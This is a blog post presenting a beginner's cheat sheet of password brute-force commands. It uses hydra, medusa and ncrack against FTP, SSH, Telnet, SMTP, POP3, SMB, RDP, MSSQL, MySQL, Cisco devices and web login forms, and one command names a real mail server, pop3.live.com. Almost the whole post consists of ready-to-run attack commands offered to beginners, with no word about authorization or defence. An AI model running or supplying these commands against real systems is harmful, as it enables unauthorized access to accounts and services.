The Beginner Bruteforce Guide

Requirements:-

- Wordlist (https://github.com/danielmiessler/SecLists)
- Username(or userlist /usr/share/wordlist)
- Kali Linux or Termux (Google For Termux For Tools Installation!)
- Working Internet

FTP Bruteforce 📁

1️⃣ Hydra 🐍
$ hydra -l superuser -P pwd.txt -v -f -e ns -t 5 -w 20 <ip> ftp >> brute_ftp.out

$ hydra -t 5 -V -f -l root -P common.txt ftp://<ip> >> brute_ftp.out

$ hydra -v -f -l ftp -P fpass.lst -t 10 ftp://<ip> >> brute_ftp.out

$ hydra -l root -P 500-worst-passwords.txt <ip> ftp

For the parameters please type hydra -h !

2️⃣ Medusa 🗿
$ medusa -u test -P 500-worst-passwords.txt -h <ip> -M ftp

$ medusa -M ftp -h <ip> -u username -p password


SSH 📡

1️⃣ Medusa 🗿
$ medusa -h <target> -P /root/pasword.txt -u root -M ssh

2️⃣ NCrack 🦀
$ ncrack -p ssh -u root --pass 'root'
<target>

3️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -P common.txt localhost ssh >> brute_ssh.out

$ hydra -v -l root -P 500-worst-passwords.txt <target> ssh >> brute_ssh.out

$ hydra -v -l root -P fpass.lst -t 5 ssh://ip -o brute_ssh.out

Telnet 📞

1️⃣ Hydra 🐍
$ hydra -v -l root -P fpass.lst -t 5 telnet://<ip> >> brute_telnet.out

$ hydra -l username -P wordlist -t 4 -s 23 -e ns -f -v <ip> telnet >> brute_telnet.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -M telnet -U user.txt -P password.txt

SMTP 📧

1️⃣ Medusa 🗿
$ medusa -M smtp -m AUTH:NTLM -U accounts.txt -p password

$ medusa -M smtp -m EHLO:world -U accounts.txt -p password

SMTP VRFY 📧

1️⃣ Medusa 🗿
$ medusa -M smtp-vrfy -m VERB:VRFY -U accounts.txt -p domain.com

2️⃣ Smtp-User-Enum 🔩
$ smtp-user-enum -M VRFY -U /home/weak_wordlist/userall.txt -t <ip>

SMTP RCPT TO 📧

1️⃣ Medusa 🗿
medusa -M smtp-vrfy -m VERB:RCPT TO -U accounts.txt -p domain.com

HTTP 🔓

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -p 12345678 -e s -V -f <ip> http-get

HTTPS 🔐

1️⃣ Hydra 🐍
$ hydra -m /tip/ -L Userid.txt -P List.txt -e s -V -f <ip> https-get

POP3 📥

1️⃣ Medusa 🗿
$ medusa -M pop3 -m MODE:AS400 -U accounts.txt -p password

$ medusa -M pop3 -m DOMAIN:<url> -U accounts.txt -p password

2️⃣ Hydra 🐍
$ hydra -l muts -P pass.txt my.pop3.mail pop3 >> brute_pop3.out

$ hydra -S -l <youremail@domain> -P password.lst pop3.live.com -s 995 pop3 >> brute_pop3.out

SMB 📡

1️⃣ Hydra 🐍
$ hydra  -v  -l Administrator -P fpass.lst smb://<ip> >> brute_smb.out

$ hydra -L user.txt -P pass.txt -e ns -f -v -V -w5 <ip> smb >> brute_smb.out

2️⃣ Medusa 🗿
$ medusa -h <ip> -u administrator -P passwords.txt -e ns -M smbnt >> brute_smb.out

Cisco 🖲
1️⃣ Hydra 🐍
$ hydra -f -v -P pass.txt <ip> cisco >> brute_cisco.out

$ hydra -m cloud -P pass.txt <ip> cisco-enable >> brute_cisco.out

MSSQL 🧱

1️⃣ Hydra 🐍
$ hydra -v -l sa -P fpass.lst -t 4 <ip> mssql -o brute_mssql.out

$ hydra -t 5 -V -f -l sa -P "C:\pass.txt" <ip> mssql

$ hydra mssql://<ip>:1433 -l sa -P /root/Desktop/parolalar

MySQL 📅

1️⃣ Hydra 🐍
$ hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql

$ hydra -v -l root -P fpass.lst -t 1 mysql://ip -o brute_mysql.out

RDP 🔮

1️⃣ Hydra 🐍
$ hydra -v -f -l administrator -P common.txt rdp://<ip> // not good

2️⃣ Medusa 🗿
$ medusa -u administrator -P /usr/share/john/password.lst -h 10.10.10.71 -M rdp

3️⃣ NCrack 🦀
$ ncrack -p rdp -u administrator --pass 'password' -iL in2

$ ncrack -vv --user offsec -P password-file.txt rdp://<ip>

WebForm 🕸
1️⃣ Hydra 🐍
$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

$ hydra -t 4 -l admin -V -P common.txt <ip> http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"



@𝑇𝘩𝑒𝑀𝑎𝑠𝑡𝑒𝑟𝐶𝐻) ⚠️





Enjoy! Follow us for more...

No comments:

Post a Comment

How to Create custom Spark skins as MXML components in Adobe Flex (Spark architecture).mp4

  Download  How to create custom Spark skins as MXML components.mp4 Creating custom Spark skins as MXML components in Adobe Flex (Spark arc...